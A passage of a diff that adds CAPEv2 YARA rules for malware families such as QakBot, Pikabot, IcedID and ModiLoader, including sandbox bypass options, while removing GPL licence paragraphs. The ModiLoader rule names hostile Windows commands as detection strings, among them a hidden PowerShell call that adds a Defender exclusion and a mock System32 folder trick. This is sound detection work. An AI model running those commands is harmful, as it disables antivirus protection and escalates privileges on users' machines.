"https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Lumma.yar#L16-L27" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "51093379fbd041f75bdfe161bc9dfcc7d782c23ce16d625ca558bb58d8d57713" + score = 75 + quality = 70 + tags = "" + cape_options = "ntdll-remap=0" + packed = "7972cbf2c143cea3f90f4d8a9ed3d39ac13980adfdcf8ff766b574e2bbcef1b4" + + strings: + $remap = {C6 44 24 20 00 C7 44 24 1C C2 00 00 90 C7 44 24 18 00 00 FF D2 C7 44 24 14 00 BA 00 00 C7 44 24 10 B8 00 00 00 8B ?? 89 44 24 11} + + condition: + any of them +} +rule CAPE_Modiloader : FILE +{ + meta: + description = "ModiLoader detonation shim" + author = "ditekSHen" + id = "2b3fd8ec-b672-574b-9b50-1a9ca9f43299" + date = "2023-10-19" + modified = "2023-10-19" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/ModiLoader.yar#L1-L39" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "fc006377e6d41515503b0b234ff87f59d930a7d9f8b32d2e072de79b9c52ddc4" + score = 75 + quality = 66 + tags = "FILE" + cape_options = "ntdll-protect=0" + + strings: + $x1 = "*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@" fullword wide + $x2 = "dntdll" fullword wide + $x3 = "USERPROFILE" fullword wide + $s1 = "%s, ProgID: \"%s\"" ascii + $s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii + $s3 = "responsetext" ascii + $s4 = "C:\\Users\\Public\\" ascii + $s5 = "[InternetShortcut]" fullword ascii + $c1 = "start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command \"Add-MpPreference -ExclusionPath 'C:\\Users'\" & exit" ascii nocase + $c2 = "mkdir \"\\\\?\\C:\\Windows \"" ascii nocase + $c3 = "mkdir \"\\\\?\\C:\\Windows \\System32\"" ascii nocase + $c4 = "ECHO F|xcopy \"" ascii nocase + $c5 = "\"C:\\Windows \\System32\" /K /D /H /Y" ascii nocase + $c6 = "ping 127.0.0.1 -n 6 > nul" ascii nocase + $c7 = "del /q \"C:\\Windows \\System32\\*\"" ascii nocase + $c8 = "rmdir \"C:\\Windows \\System32\"" ascii nocase + $c9 = "rmdir \"C:\\Windows \"" ascii nocase + $g1 = "powershell" ascii nocase + $g2 = "mkdir \"\\\\?\\C:\\" ascii nocase + $g3 = "\" /K /D /H /Y" ascii nocase + $g4 = "ping 127.0.0.1 -n" ascii nocase + $g5 = "del /q \"" ascii nocase + $g6 = "rmdir \"" ascii nocase + + condition: + uint16(0)==0x5a4d and ((2 of ($x*) and ( all of ($g*) or (2 of ($s*) and 2 of ($c*)))) or ( all of ($s*) and (2 of ($c*) or all of ($g*))) or (4 of ($c*) and (1 of ($x*) or 2 of ($s*))) or ( all of ($g*) and 4 of ($c*)) or 13 of them ) +} +rule CAPE_Dridexloader : FILE +{ + meta: + description = "DridexLoader API Spam Bypass" + author = "kevoreilly" + id = "a8b62f64-87a0-58d3-8876-9b0f6a7deb97" + date = "2021-03-09" + modified = "2021-03-09" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/DridexLoader.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "00a3e4e80a2558ee52035f091e2339fa2dad6f6515b9dc099f2f3800e4c70bce" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$trap-13,action0=ret,count=0" + + strings: + $trap = {6A 50 6A 14 6A 03 5A 8D 4C 24 ?? E8 [4] 68 [4] 68 [4] E8 [4] 85 C0 74 05} + + condition: + uint16(0)==0x5A4D and $trap +} +rule CAPE_Latrodectus : FILE +{ + meta: + description = "Latrodectus export selection" + author = "kevoreilly" + id = "7c6f167a-6b76-5509-b164-306d1cd19b0f" + date = "2024-02-26" + modified = "2024-02-26" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Latrodectus.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05" + logic_hash = "c2c9f23e287253d766425c05eb774f6e07bdcbabc259e04b723a1a87c8b91fbd" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "export=$export" + + strings: + $export = {48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 EC 30 4C 8B 05 [4] 33 D2 C7 40 [5] 88 50 ?? 49 63 40 3C 42 8B 8C 00 88 00 00 00 85 C9 0F 84} + + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Darkgateloader +{ + meta: + description = "DarkGate Loader" + author = "enzok" + id = "ca39f39d-aa89-5018-bb07-008a6ea86c42" + date = "2023-10-02" + modified = "2023-10-02" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/DarkGateLoader.yar#L1-L15" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "56069f38edb7d50b0d5680a847d85b1aabc97e432a37911ac9d28aee3b12f526" + score = 75 + quality = 68 + tags = "" + cape_options = "bp0=$decrypt1+30,bp0=$decrypt2+29,action0=dump:eax::ebx,bp1=$decrypt3+80,action1=dumpsize:eax,bp2=$decrypt3+124,hc2=1,action2=dump:eax,count=0" + packed = "b15e4b4fcd9f0d23d902d91af9cc4e01417c426e55f6e0b4ad7256f72ac0231a" + + strings: + $loader = {6C 6F 61 64 65 72} + $decrypt1 = {B? 01 00 00 00 8B [3] E8 [4] 8B D7 32 54 [4] 88 54 18 FF 4? 4? 75} + $decrypt2 = {B? 01 00 00 00 8B [2] E8 [4] 8B D7 2B D3 [4] 88 54 18 FF 4? 4? 75} + $decrypt3 = {89 85 [4] 8B 85 [4] 8B F0 8D BD [4] B? 10 [3] F3 A5 8B 85 [4] 33 D2 [2] 8B 85 [4] 99} + + condition: + $loader and any of ($decrypt*) +} +rule CAPE_Gettickcountantivm +{ + meta: + description = "GetTickCountAntiVM bypass" + author = "kevoreilly" + id = "d90b9768-0525-5963-9817-e3a53b1d4cf3" + date = "2022-02-25" + modified = "2022-02-25" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/GetTickCountAntiVM.yar#L1-L20" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "662bc7839ed7ddd82d5fdafa29fafd9a9ec299c28820fe4104fbba9be1a09c42" + hash = "00f1537b13933762e1146e41f3bac668123fac7eacd0aa1f7be0aa37a91ef3ce" + hash = "549bca48d0bac94b6a1e6eb36647cd007fed5c0e75a0e4aa315ceabdafe46541" + hash = "90c29a66209be554dfbd2740f6a54d12616da35d0e5e4af97eb2376b9d053457" + logic_hash = "9cdb0b2d2e058e1858c2f2baad67005a2019fbbdcb7ca54571c8d20dfbf33471" + score = 75 + quality = 70 + tags = "" + cape_options = "bp0=$antivm1-13,bp0=$antivm5-40,bp0=$antivm6,action0=wret,hc0=1,bp1=$antivm2-6,action1=wret,hc1=1,count=1,bp2=$antivm3+42,action2=jmp:96,bp3=$antivm4-9,action3=wret,hc3=1" + + strings: + $antivm1 = {57 FF D6 FF D6 BF 01 00 00 00 FF D6 F2 0F 10 0D [4] 47 66 0F 6E C7 F3 0F E6 C0 66 0F 2F C8 73} + $antivm2 = {F2 0F 11 45 ?? FF 15 [4] 6A 00 68 10 27 00 00 52 50 E8 [4] 8B C8 E8 [4] F2 0F 59 45} + $antivm3 = {0F 57 C0 E8 [4] 8B 35 [4] BF 01 00 00 00 FF D6 F2 0F 10 0D [4] 47 66 0F 6E C7 F3 0F E6 C0 66 0F 2F C8 73} + $antivm4 = {F2 0F 11 45 EC FF 15 [4] 8B DA 8B C8 BA [4] 89 5D FC F7 E2 BF [4] 89 45 F4 8B F2 8B C1 B9} + $antivm5 = {BB 01 00 00 00 8B FB 90 FF 15 [4] FF C7 66 0F 6E C7 F3 0F E6 C0 66 0F 2F F8 73 EA} + $antivm6 = {48 81 EC 88 00 00 00 0F 57 C0 F2 0F 11 44 [2] F2 0F 10 05 [4] F2 0F 11 44 [2] F2 0F 10 05 [4] F2 0F 11} + + condition: + any of them +} +rule CAPE_Emotetpacker : FILE +{ + meta: + description = "Emotet bypass" + author = "kevoreilly" + id = "67b8e14c-5fa8-52af-bb9a-1663b084fbf0" + date = "2022-06-09" + modified = "2022-06-09" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/EmotetPacker.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "5a95d1d87ce69881b58a0e3aafc1929861e2633cdd960021d7b23e2a36409e0d" + logic_hash = "5f27d9d18884f7e0805f69960869b332c1577bf8be8ac103285e8bf98cda0ffd" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$trap1+31,action0=skip,bp1=$trap2+43,action1=jmp:186,count=1" + + strings: + $trap1 = {8B 45 08 0F 28 0D [4] 0F 57 C0 0F 29 46 30 89 46 40 C7 46 44 00 00 00 00 0F 11 4E 48 E8} + $trap2 = {F2 0F 10 15 [4] BE 01 00 00 00 0F 01 F9 C7 44 24 60 00 00 00 00 89 4C 24 60 0F 01 F9 C7 44 24 5C 00 00 00 00 89 4C 24 5C 0F 1F 84 00 00 00 00 00} + + condition: + uint16(0)==0x5A4D and any of ($trap*) +} +rule CAPE_Pikahook : FILE +{ + meta: + description = "Pikabot anti-hook bypass" + author = "kevoreilly" + id = "e1b7a807-135f-52d7-bc36-c0419e82b424" + date = "2024-03-12" + modified = "2024-03-12" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Pikabot.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "2a50a5f2d905122a5b7ac8ca3666b47caa24d325e246841129e53807daf2a1dd" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "clear,sysbp=$indirect+40,sysbpmode=1,force-sleepskip=1" + packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9" + + strings: + $indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1 [4] FF 15} + $sysenter1 = {89 44 24 08 8D 85 20 FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8} + $sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8} + + condition: + uint16(0)==0x5A4D and 2 of them +} +rule CAPE_Pikexport : FILE +{ + meta: + description = "Pikabot export selection" + author = "kevoreilly" + id = "7d2432f2-90ae-5ad0-b579-5789a1c14a08" + date = "2024-03-12" + modified = "2024-03-12" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Pikabot.yar#L16-L28" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "238dcc5611ed9066b63d2d0109c9b623f54f8d7b61d5f9de59694cfc60a4e646" + logic_hash = "33f58703a0e40c2361343dbdcc17111aafbf5cc912393edda79005c6ec566f42" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "export=$export" + + strings: + $export = {55 8B EC 83 EC ?? C6 45 [2] C6 45 [2] C6 45 [2] C6 45 [2] C6 45} + $pe = {B8 08 00 00 00 6B C8 00 8B 55 ?? 8B 45 ?? 03 44 0A 78 89 45 ?? 8B 4D ?? 8B 51 18 89 55 E8 C7 45 F8 00 00 00 00} + + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Blister : FILE +{ + meta: + description = "Blister Sleep Bypass" + author = "kevoreilly" + id = "34657bab-f100-5ea8-9111-da2806f46b79" + date = "2024-05-09" + modified = "2024-05-09" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Blister.yar#L1-L17" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "aba379b93c85241cf250829832b2c8a5eaafb3abd0ff955dbaf0d06489c00deb" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$sleep1+6,bp1=$sleep2+7,action0=setsignflag,action1=clearcarryflag,count=3" + packed = "0a7778cf6f9a1bd894e89f282f2e40f9d6c9cd4b72be97328e681fe32a1b1a00" + packed = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2" + + strings: + $sleep1 = {FF FF 83 7D F0 00 (E9|0F 8?)} + $sleep2 = {81 7D D8 90 B2 08 00 (E9|0F 8?)} + $protect = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7} + $lock = {56 33 F6 B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75 F7} + $comp = {6A 04 59 A1 [4] 8B 78 04 8B 75 08 33 C0 F3 A7 75 0B 8B 45 0C 83 20 00 33 C0 40 EB 02 33 C0} + + condition: + uint16(0)==0x5A4D and 2 of ($protect,$lock,$comp) and all of ($sleep*) +} +rule CAPE_Socks5Systemz : FILE +{ + meta: + description = "Socks5Systemz config extraction" + author = "kevoreilly" + id = "75831382-bb43-554e-93b1-f54a2255d8b9" + date = "2024-05-22" + modified = "2024-05-22" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Socks5Systemz.yar#L1-L18" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "44b83b6d2ab39b4258ae0d97d00d02afdbb62a3973fd788584e4dea9db69cc1b" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "br0=user32::wsprintfA,action1=string:[esp],count=0,typestring=Socks5Systemz Config" + packed = "9b997d0de3fe83091726919a0dc653e22f8f8b20b1bb7d0b8485652e88396f29" + + strings: + $chunk1 = {0F B6 84 8A [4] E9 [3] (00|FF)} + $chunk2 = {0F B6 04 8D [4] E9 [3] (00|FF)} + $chunk3 = {0F B6 04 8D [4] E9 [3] (00|FF)} + $chunk4 = {0F B6 04 8D [4] E9 [3] (00|FF)} + $chunk5 = {66 0F 6F 05 [4] E9 [3] (00|FF)} + $chunk6 = {F0 0F B1 95 [4] E9 [3] (00|FF)} + $chunk7 = {83 FA 04 E9 [3] (00|FF)} + + condition: + uint16(0)==0x5A4D and 6 of them +} +rule CAPE_Heavenssyscall : FILE +{ + meta: + description = "Bypass variants of heaven's gate direct syscalls" + author = "kevoreilly" + id = "7c60102a-ac8b-5e28-8dbb-4b6c3f4cddff" + date = "2024-03-25" + modified = "2024-03-25" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/HeavensSyscall.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "aeb981fcba0936ff8b1be4c601445fd45e5d3b74856a9439d351edd57f5a50c3" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "clear,br0=$gate1-9,action1=seteax:0,count=0,sysbp=$sysenter+10" + packed = "2950b4131886e06bdb83ab1611b71273df23b0d31a4d8eb6baddd33327d87ffa" + + strings: + $gate1 = {00 00 00 00 74 24 8D 45 F8 50 6A FF FF 95 [4] 85 C0 74 08 8B 4D F8 89 4D FC EB 07 C7 45 FC 00 00 00 00 8B 45 FC EB 02 33 C0 8B E5 5D C2 C0} + $sysenter = {68 [4] E8 [4] E8 [4] C2 ?? 00 CC CC CC CC CC CC CC CC} + + condition: + uint16(0)==0x8B55 and all of them +} +rule CAPE_Qakbot5 : FILE +{ + meta: + description = "QakBot WMI anti-anti-vm" + author = "kevoreilly" + id = "d287b043-15df-5865-ad4c-9eb64ceec04c" + date = "2024-02-16" + modified = "2024-02-16" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/QakBot.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "303ea2d8d1a7f0fd0ca5508dae2c1b83c03b1e3e975760f15d36d93bcc152767" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$loop+35,action0=skip,count=0" + packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2" + + strings: + $loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E} + $conf = {0F B7 1D [4] B9 [2] 00 00 E8 [4] 8B D3 48 89 45 ?? 45 33 C9 48 8D 0D [4] 4C 8B C0 48 8B F8 E8} + + condition: + uint16(0)==0x5A4D and any of them +} +rule CAPE_Qakbot4 : FILE +{ + meta: + description = "QakBot Config Extraction" + author = "kevoreilly" + id = "401184cf-bbd7-5afe-9589-470f54721af1" + date = "2024-02-16" + modified = "2024-02-16" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/QakBot.yar#L15-L29" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "ad75b07b9b786f634fd46cbe6dc089d3f732673320e70714e8ab058f0392c9f5" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config" + packed = "f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68" + + strings: + $params = {8B 7D ?? 8B F1 57 89 55 ?? E8 [4] 8D 9E [2] 00 00 89 03 59 85 C0 75 08 6A FC 58 E9} + $c2list1 = {59 59 8D 4D D8 89 45 E0 E8 [4] 8B 45 E0 85 C0 74 ?? 8B 90 [2] 00 00 51 8B 88 [2] 00 00 6A 00 E8} + $c2list2 = {59 59 8B F8 8D 4D ?? 89 7D ?? E8 [4] 85 FF 74 52 8B 97 [2] 00 00 51 8B 8F [2] 00 00 53 E8} + $conf = {5F 5E 5B C9 C3 51 6A 00 E8 [4] 59 59 85 C0 75 01 C3} + + condition: + uint16(0)==0x5A4D and any of them +} +rule CAPE_Qakbotloader : FILE +{ + meta: + description = "QakBot Export Selection" + author = "kevoreilly" + id = "b2d5ef1c-0651-5249-9c4b-7e83235d4a30" + date = "2024-02-16" + modified = "2024-02-16" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/QakBot.yar#L31-L46" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "6f99171c95a8ed5d056eeb9234dbbee123a6f95f481ad0e0a966abd2844f0e1a" + logic_hash = "00869c0a9bf62cde3f46ca915b0ef689557b09dc58d6de34609e3998abfa7e98" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "export=$export1,export=$export2,export=$export3" + + strings: + $export1 = {55 8B EC 83 EC 50 (3A|66 3B) ?? 74} + $export2 = {55 8B EC 3A ?? 74 [8-16] 74 [6-16] EB} + $export3 = {55 8B EC 66 3B ?? 74 [3-5] 74} + $wind = {(66 3B|3A) ?? 74 [1-14] BB 69 04 00 00 53 E? [5-20] 74} + $getteb = {EB 00 55 8B EC 66 3B E4 74 ?? [1-5] 64 A1 18 00 00 00 5D EB} + + condition: + uint16(0)==0x5A4D and ( any of ($export*)) and ($wind or $getteb) +} +rule CAPE_Qakbotantivm +{ + meta: + description = "QakBot AntiVM bypass" + author = "kevoreilly" + id = "7446522a-788a-512d-ad68-2fcc56169f5a" + date = "2024-02-16" + modified = "2024-02-16" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/QakBot.yar#L48-L59" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "e269497ce458b21c8427b3f6f6594a25d583490930af2d3395cb013b20d08ff7" + logic_hash = "20f1cd28f38945a3aa328e77e78525fb1ffc47ecf54d5a40c2f18264c3973989" + score = 75 + quality = 70 + tags = "" + cape_options = "bp0=$antivm1,action0=unwind,count=1" + + strings: + $antivm1 = {55 8B EC 3A E4 0F [2] 00 00 00 6A 04 58 3A E4 0F [2] 00 00 00 C7 44 01 [5] 81 44 01 [5] 66 3B FF 74 ?? 6A 04 58 66 3B ED 0F [2] 00 00 00 C7 44 01 [5] 81 6C 01 [5] EB} + + condition: + all of them +} +rule CAPE_Rhadamanthys +{ + meta: + description = "No description has been set in the source file - CAPE" + author = "kevoreilly" + id = "d9d387e1-76b3-55f6-a40f-a8c9cb9e9bea" + date = "2023-04-18" + modified = "2023-04-18" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Rhadamanthys.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "3c8fbfe14f81e099fc900023d9c856e3f45b99af38889ed952b2ac67a636f51d" + score = 75 + quality = 70 + tags = "" + cape_options = "bp0=$conf-11,hc0=1,action0=setdump:edx::ebx,bp1=$conf+64,hc1=1,action1=dump,count=0,typestring=Rhadamanthys Config,ntdll-protect=0" + packed = "9e28586ab70b1abdccfe087d81e326a0703f75e9551ced187d37c51130ad02f5" + + strings: + $rc4 = {88 4C 01 08 41 81 F9 00 01 00 00 7C F3 89 75 08 33 FF 8B 4D 08 3B 4D 10 72 04 83 65 08 00} + $code = {8B 4D FC 3B CF 8B C1 74 0D 83 78 04 02 74 1C 8B 40 1C 3B C7 75 F3 3B CF 8B C1 74 57 83 78 04 17 74 09 8B 40 1C 3B C7 75 F3 EB} + $conf = {46 BB FF 00 00 00 23 F3 0F B6 44 31 08 03 F8 23 FB 0F B6 5C 39 08 88 5C 31 08 88 44 39 08 02 C3 8B 5D 08 0F B6 C0 8A 44 08 08} + + condition: + 2 of them +} +rule CAPE_Ursnifv3 +{ + meta: + description = "Ursnif Config Extraction" + author = "kevoreilly" + id = "4170b638-e51b-59c6-956a-50ff82f629ba" + date = "2023-03-23" + modified = "2023-03-23" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/UrsnifV3.yar#L1-L16" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "d679546e37ee58087fce75920b2ce4e6d2b9ae55fb1ef80d14ec14309396757c" + score = 75 + quality = 70 + tags = "" + cape_options = "br0=$crypto32_1-48,action1=dump:ebx::eax,bp2=$crypto32_3+50,action2=dump:ebx::eax,bp3=$crypto32_4+11,action3=dump:eax::ecx,typestring=UrsnifV3 Config,count=1" + packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988" + packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579" + + strings: + $crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00} + $crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [4] 8B D8 89 5C 24 1C 85 DB 74 41 F6 46 03 01 74 53 8B 46 10 89 44 24 1C 8B 46 0C 53 03 C7 E8 [4] 59} + $crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4E 10 C6 04 08 00 8B 4D ?? 89 01 8B 46 ?? 8B 4D ?? 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00} + $cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3} - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. + condition: + any of ($crypto32*) and $cpuid +} +rule CAPE_Slowloader +{ + meta: + description = "SlowLoader detonation aide for slow cpus (thread race)" + author = "kevoreilly" + id = "05724bf4-b767-542d-a2dd-a9ae3e5ea5cc" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/SlowLoader.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "f07528c646ebd980a5e843caa4a4715e31b22c3cd091576600e9fe45d7fc2fe4" + score = 75 + quality = 70 + tags = "" + cape_options = "break-on-return=CreateProcessA,action0=sleep:1000,count=0" + packed = "f6eeb73ffb3e6d6cc48f74344cb590614db7e3116ba00a52aefd7dff468a60a5" - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. + strings: + $code = {0F B6 44 07 08 0F B6 54 1F 08 03 C2 25 FF 00 00 80 79 07 48 0D 00 FF FF FF 40 89 45 ?? 6A 00} - 7. Additional Terms. + condition: + any of them +} +rule CAPE_Icedidsyscallwritemem : FILE +{ + meta: + description = "IcedID 'syscall' packer bypass - direct write variant" + author = "kevoreilly" + id = "67935058-4191-587f-ad19-497defd0eef1" + date = "2023-11-28" + modified = "2023-11-28" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/IcedID.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "6b068106b038e9efeb9057cadf314d400c1ada1a1cc70336d3272da3a212c993" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$tokencheck+9,action0=jmp,count=0" + packed = "28075ecae5e224c06e250f2c949c826b81844bca421e9158a7a9e965a29ef894" + packed = "045dff9f14a03225df55997cb2ca74ff60ecaf317b9e033ea93386785db84161" - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. + strings: + $tokencheck = {39 5D ?? 75 06 83 7D ?? 03 74 05 BB 01 00 00 00 41 89 1C ?? 48 8B 4D ?? 41 FF D?} - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. + condition: 